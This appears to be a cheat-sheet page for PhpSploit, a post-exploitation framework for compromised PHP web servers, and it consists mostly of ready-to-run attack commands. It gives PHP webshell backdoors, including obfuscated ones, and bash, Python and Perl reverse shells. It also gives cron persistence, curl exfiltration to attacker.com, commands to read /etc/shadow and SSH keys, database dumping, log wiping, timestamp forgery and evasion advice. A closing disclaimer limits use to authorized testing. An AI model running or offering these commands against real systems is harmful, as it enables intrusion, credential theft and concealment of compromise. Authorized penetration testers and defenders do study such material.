PhpSploit
Overview
Abschnitt betitelt „Overview“PhpSploit is a remote administration framework designed for stealth post-exploitation activities on compromised PHP web servers. It operates through hidden PHP backdoors, allowing attackers to interact with compromised systems while evading detection. The framework provides command execution, file management, and system enumeration capabilities.
Key Features:
- Stealth PHP backdoor deployment
- Interactive remote shell environment
- File upload, download, and manipulation
- System enumeration and reconnaissance
- Memory-based operation (minimal disk footprint)
- Anti-detection capabilities
- Multi-session management
Installation
Abschnitt betitelt „Installation“From GitHub
Abschnitt betitelt „From GitHub“git clone https://github.com/nil0x42/phpsploit.git
cd phpsploit
chmod +x phpsploitRequirements
Abschnitt betitelt „Requirements“- Python 3.6+
- A web server with PHP execution capability
- Target web server accessible
Verify Installation
Abschnitt betitelt „Verify Installation“./phpsploit --version
./phpsploit --helpdocker run -it --rm phpsploitBasic Setup
Abschnitt betitelt „Basic Setup“Start PhpSploit Console
Abschnitt betitelt „Start PhpSploit Console“./phpsploitConnect to Existing Backdoor
Abschnitt betitelt „Connect to Existing Backdoor“phpsploit> connect http://target.com/shell.phpDeploy New Backdoor
Abschnitt betitelt „Deploy New Backdoor“phpsploit> upload shell.php http://target.com/upload/Interactive Shell
Abschnitt betitelt „Interactive Shell“phpsploit> shellCore Commands
Abschnitt betitelt „Core Commands“| Command | Description |
|---|---|
connect | Connect to backdoor URL |
upload | Deploy backdoor to server |
download | Download file from server |
shell | Interactive command shell |
run | Execute system command |
set | Configure framework settings |
exploit | Run exploitation modules |
sessions | Manage active sessions |
help | Display command help |
quit | Exit framework |
Connection Management
Abschnitt betitelt „Connection Management“Connect to Backdoor
Abschnitt betitelt „Connect to Backdoor“phpsploit> connect http://target.com/index.php
phpsploit> connect http://target.com:8080/shell.php
phpsploit> connect http://target.com/admin/upload/shell.phpConnection with Proxy
Abschnitt betitelt „Connection with Proxy“phpsploit> set proxy http://127.0.0.1:8080
phpsploit> connect http://target.com/shell.phpAuthentication
Abschnitt betitelt „Authentication“phpsploit> set user admin
phpsploit> set password secret123
phpsploit> connect http://target.com/shell.phpSession Management
Abschnitt betitelt „Session Management“phpsploit> sessions
phpsploit> sessions 1
phpsploit> sessions -k 1 # Kill sessionRemote Command Execution
Abschnitt betitelt „Remote Command Execution“Execute Single Command
Abschnitt betitelt „Execute Single Command“phpsploit> run id
phpsploit> run whoami
phpsploit> run pwd
phpsploit> run uname -aInteractive Shell Mode
Abschnitt betitelt „Interactive Shell Mode“phpsploit> shell
[shell]> id
[shell]> whoami
[shell]> ls -la
[shell]> exitExecute Shell Scripts
Abschnitt betitelt „Execute Shell Scripts“phpsploit> run bash -c "for i in {1..10}; do echo $i; done"
phpsploit> run sh -c "cat /etc/passwd"
phpsploit> run perl -e 'print "Hello\n"'Background Command Execution
Abschnitt betitelt „Background Command Execution“phpsploit> run nohup bash -i >& /dev/tcp/attacker.com/4444 0>&1 &File Operations
Abschnitt betitelt „File Operations“Upload Files
Abschnitt betitelt „Upload Files“phpsploit> upload /path/to/local/file.txt /var/www/html/
phpsploit> upload shell.php /var/www/html/uploads/
phpsploit> upload /path/to/payload.elf /tmp/Download Files
Abschnitt betitelt „Download Files“phpsploit> download /etc/passwd ./password_dump.txt
phpsploit> download /var/www/html/config.php ./config_backup.php
phpsploit> download /etc/shadow ./shadow_dumpList Remote Directory
Abschnitt betitelt „List Remote Directory“phpsploit> run ls -la /var/www/html/
phpsploit> run find /var/www/html -type f -name "*.php"
phpsploit> run du -sh /var/www/html/*Create/Modify Files
Abschnitt betitelt „Create/Modify Files“phpsploit> run echo "<?php system(\$_GET['c']); ?>" > /var/www/html/shell.php
phpsploit> run cat > /tmp/malware.sh << EOF
# malware script here
EOFSystem Enumeration
Abschnitt betitelt „System Enumeration“Get System Information
Abschnitt betitelt „Get System Information“phpsploit> run uname -a
phpsploit> run cat /etc/os-release
phpsploit> run hostnamectl
phpsploit> run whoami
phpsploit> run idNetwork Information
Abschnitt betitelt „Network Information“phpsploit> run ip addr show
phpsploit> run ifconfig
phpsploit> run netstat -tulpn
phpsploit> run ss -tulpnProcess Enumeration
Abschnitt betitelt „Process Enumeration“phpsploit> run ps aux
phpsploit> run ps aux | grep -i apache
phpsploit> run ps aux | grep -i nginxUser and Privilege Information
Abschnitt betitelt „User and Privilege Information“phpsploit> run cat /etc/passwd
phpsploit> run sudo -l
phpsploit> run cat /etc/sudoersDisk and Storage Information
Abschnitt betitelt „Disk and Storage Information“phpsploit> run df -h
phpsploit> run mount
phpsploit> run lsblkBackdoor Deployment
Abschnitt betitelt „Backdoor Deployment“PHP Backdoor Creation
Abschnitt betitelt „PHP Backdoor Creation“# Simple one-liner backdoor
<?php system($_GET['cmd']); ?>
# More stealthy version
<?php if(isset($_POST['c'])){ echo "<pre>";system($_POST['c']);echo "</pre>"; } ?>
# Base64 encoded command execution
<?php system(base64_decode($_GET['x'])); ?>Deploy Backdoor via PhpSploit
Abschnitt betitelt „Deploy Backdoor via PhpSploit“phpsploit> upload backdoor.php /var/www/html/
phpsploit> connect http://target.com/backdoor.phpObfuscated Backdoor
Abschnitt betitelt „Obfuscated Backdoor“# Variable obfuscation
<?php $a="sy"."st"."em"; $a($_GET['c']); ?>
# Function indirection
<?php $f=create_function('$x','return system($x);'); echo $f($_GET['c']); ?>Persistent Backdoor
Abschnitt betitelt „Persistent Backdoor“# Write to web root with persistence
phpsploit> run echo '<?php system($_GET["c"]); ?>' > /var/www/html/.hidden/shell.php
phpsploit> run chmod 644 /var/www/html/.hidden/shell.phpPost-Exploitation Workflows
Abschnitt betitelt „Post-Exploitation Workflows“Privilege Escalation Enumeration
Abschnitt betitelt „Privilege Escalation Enumeration“phpsploit> run sudo -l
phpsploit> run find / -perm -4000 2>/dev/null
phpsploit> run find / -writable 2>/dev/null | head -20
phpsploit> run cat /etc/crontabCredential Harvesting
Abschnitt betitelt „Credential Harvesting“phpsploit> run cat /etc/shadow
phpsploit> run cat /home/*/.bash_history
phpsploit> run cat /root/.ssh/id_rsaLateral Movement
Abschnitt betitelt „Lateral Movement“# Enumerate internal network
phpsploit> run nmap -sn 192.168.1.0/24
phpsploit> run arp -a
# Scan for open ports
phpsploit> run netstat -tulpn | grep LISTENData Exfiltration
Abschnitt betitelt „Data Exfiltration“# Tar and compress sensitive files
phpsploit> run tar -czf /tmp/data.tar.gz /var/www/html/
# Encode for exfiltration
phpsploit> run base64 /tmp/data.tar.gz > /tmp/data.b64
# Download exfiltrated data
phpsploit> download /tmp/data.b64 ./exfiltrated_data.b64Advanced Configuration
Abschnitt betitelt „Advanced Configuration“Set User Agent
Abschnitt betitelt „Set User Agent“phpsploit> set user_agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
phpsploit> set user_agent "Custom-Agent/1.0"Proxy Configuration
Abschnitt betitelt „Proxy Configuration“phpsploit> set proxy http://127.0.0.1:8080
phpsploit> set proxy socks5://127.0.0.1:9050Timeout Settings
Abschnitt betitelt „Timeout Settings“phpsploit> set timeout 30
phpsploit> set connect_timeout 10Request Headers
Abschnitt betitelt „Request Headers“phpsploit> set headers "Authorization: Bearer token123"
phpsploit> set headers "X-Custom-Header: value"Verbosity and Logging
Abschnitt betitelt „Verbosity and Logging“phpsploit> set verbosity 3
phpsploit> set logging on
phpsploit> set log_file ./phpsploit.logExploitation Techniques
Abschnitt betitelt „Exploitation Techniques“Reverse Shell Deployment
Abschnitt betitelt „Reverse Shell Deployment“# Bash reverse shell
phpsploit> run bash -i >& /dev/tcp/10.10.10.10/4444 0>&1 &
# Python reverse shell
phpsploit> run python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/sh','-i'])"
# Perl reverse shell
phpsploit> run perl -e "use Socket;$i='10.10.10.10';$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));connect(S,sockaddr_in($p,inet_aton($i)));exec('/bin/sh -i <&3 >&3 2>&3');"Cron Job Persistence
Abschnitt betitelt „Cron Job Persistence“phpsploit> run crontab -l
phpsploit> run (crontab -l; echo "* * * * * /bin/bash -i >& /dev/tcp/10.10.10.10/4444 0>&1") | crontab -SSH Key Injection
Abschnitt betitelt „SSH Key Injection“phpsploit> run mkdir -p /root/.ssh
phpsploit> run echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keysDatabase Access
Abschnitt betitelt „Database Access“phpsploit> run mysql -u root -ppassword -e "SHOW DATABASES;"
phpsploit> run mysql -u root -ppassword wordpress -e "SELECT user_login, user_pass FROM wp_users;"Defense Evasion
Abschnitt betitelt „Defense Evasion“Process Hiding
Abschnitt betitelt „Process Hiding“# Run command disassociated from parent
phpsploit> run nohup /path/to/command &
phpsploit> run setsid /path/to/commandTimestamp Manipulation
Abschnitt betitelt „Timestamp Manipulation“phpsploit> run touch -r /bin/ls /tmp/backdoor.php
phpsploit> run touch -t 202001010000 /tmp/backdoor.phpLog Sanitization
Abschnitt betitelt „Log Sanitization“phpsploit> run cat /var/log/apache2/access.log | grep -v "shell.php"
phpsploit> run > /var/log/apache2/access.log
phpsploit> run cat /dev/null > ~/.bash_historyFirewall Bypass
Abschnitt betitelt „Firewall Bypass“# DNS tunneling
phpsploit> run nslookup attacker.com
# HTTP tunneling
phpsploit> run curl http://attacker.com/callback?data=$(whoami)Scripting and Automation
Abschnitt betitelt „Scripting and Automation“Create PhpSploit Script
Abschnitt betitelt „Create PhpSploit Script“#!/bin/bash
# automated_exploitation.sh
TARGET="http://target.com/shell.php"
phpsploit <<EOF
connect $TARGET
set verbosity 2
run id
run whoami
run pwd
run uname -a
download /etc/passwd ./passwd.txt
quit
EOFBatch Command Execution
Abschnitt betitelt „Batch Command Execution“phpsploit> run 'for i in {1..10}; do echo $i; done'
phpsploit> run 'find / -name "*.conf" 2>/dev/null | head -20'
phpsploit> run 'grep -r "password" /var/www/html 2>/dev/null'Real-World Attack Scenarios
Abschnitt betitelt „Real-World Attack Scenarios“Web Server Compromise
Abschnitt betitelt „Web Server Compromise“# 1. Upload backdoor
phpsploit> upload backdoor.php /var/www/html/
# 2. Connect to backdoor
phpsploit> connect http://target.com/backdoor.php
# 3. Enumerate system
phpsploit> run uname -a
phpsploit> run id
# 4. Create persistence
phpsploit> run echo "<?php system($_GET['c']); ?>" > /var/www/html/.htaccess.phpDatabase Extraction
Abschnitt betitelt „Database Extraction“# Identify database
phpsploit> run find / -name "*.env" | grep -i database
# Extract credentials
phpsploit> run cat /var/www/html/.env | grep DATABASE
# Dump database
phpsploit> run mysqldump -u root -p database > /tmp/dump.sql
phpsploit> download /tmp/dump.sql ./database_dump.sqlApplication Server Escalation
Abschnitt betitelt „Application Server Escalation“# Identify running services
phpsploit> run ps aux | grep -i "apache\|nginx\|tomcat"
# Check for vulnerable services
phpsploit> run netstat -tulpn
# Attempt local privilege escalation
phpsploit> run sudo -l
phpsploit> run find / -perm -4000 2>/dev/nullTroubleshooting
Abschnitt betitelt „Troubleshooting“Connection Issues
Abschnitt betitelt „Connection Issues“# Verify backdoor accessibility
curl http://target.com/shell.php
# Test with different encoding
phpsploit> set encoding base64
phpsploit> connect http://target.com/shell.phpCommand Execution Problems
Abschnitt betitelt „Command Execution Problems“# Test basic commands
phpsploit> run echo test
phpsploit> run id
# Check PHP version
phpsploit> run php --versionFile Transfer Issues
Abschnitt betitelt „File Transfer Issues“# Verify file permissions
phpsploit> run ls -la /var/www/html/
# Check available space
phpsploit> run df -h /var/www/html/Security Best Practices
Abschnitt betitelt „Security Best Practices“Operational Security
Abschnitt betitelt „Operational Security“- Use VPN/proxy for all connections
- Rotate backdoor locations regularly
- Clean logs and evidence of activity
- Use encrypted communication when possible
- Establish dead drops for communication
Detection Avoidance
Abschnitt betitelt „Detection Avoidance“- Use legitimate PHP functions
- Avoid suspicious filenames
- Minimize footprint on disk
- Use appropriate timing for activities
- Monitor system for detection indicators
Version and Support
Abschnitt betitelt „Version and Support“./phpsploit --versionLegal and Ethical Considerations
Abschnitt betitelt „Legal and Ethical Considerations“Critical: PhpSploit is designed for authorized penetration testing and red team exercises only. Unauthorized access to computer systems is illegal. Always obtain explicit written authorization before deploying backdoors or conducting post-exploitation activities. Misuse of this framework may result in serious legal consequences.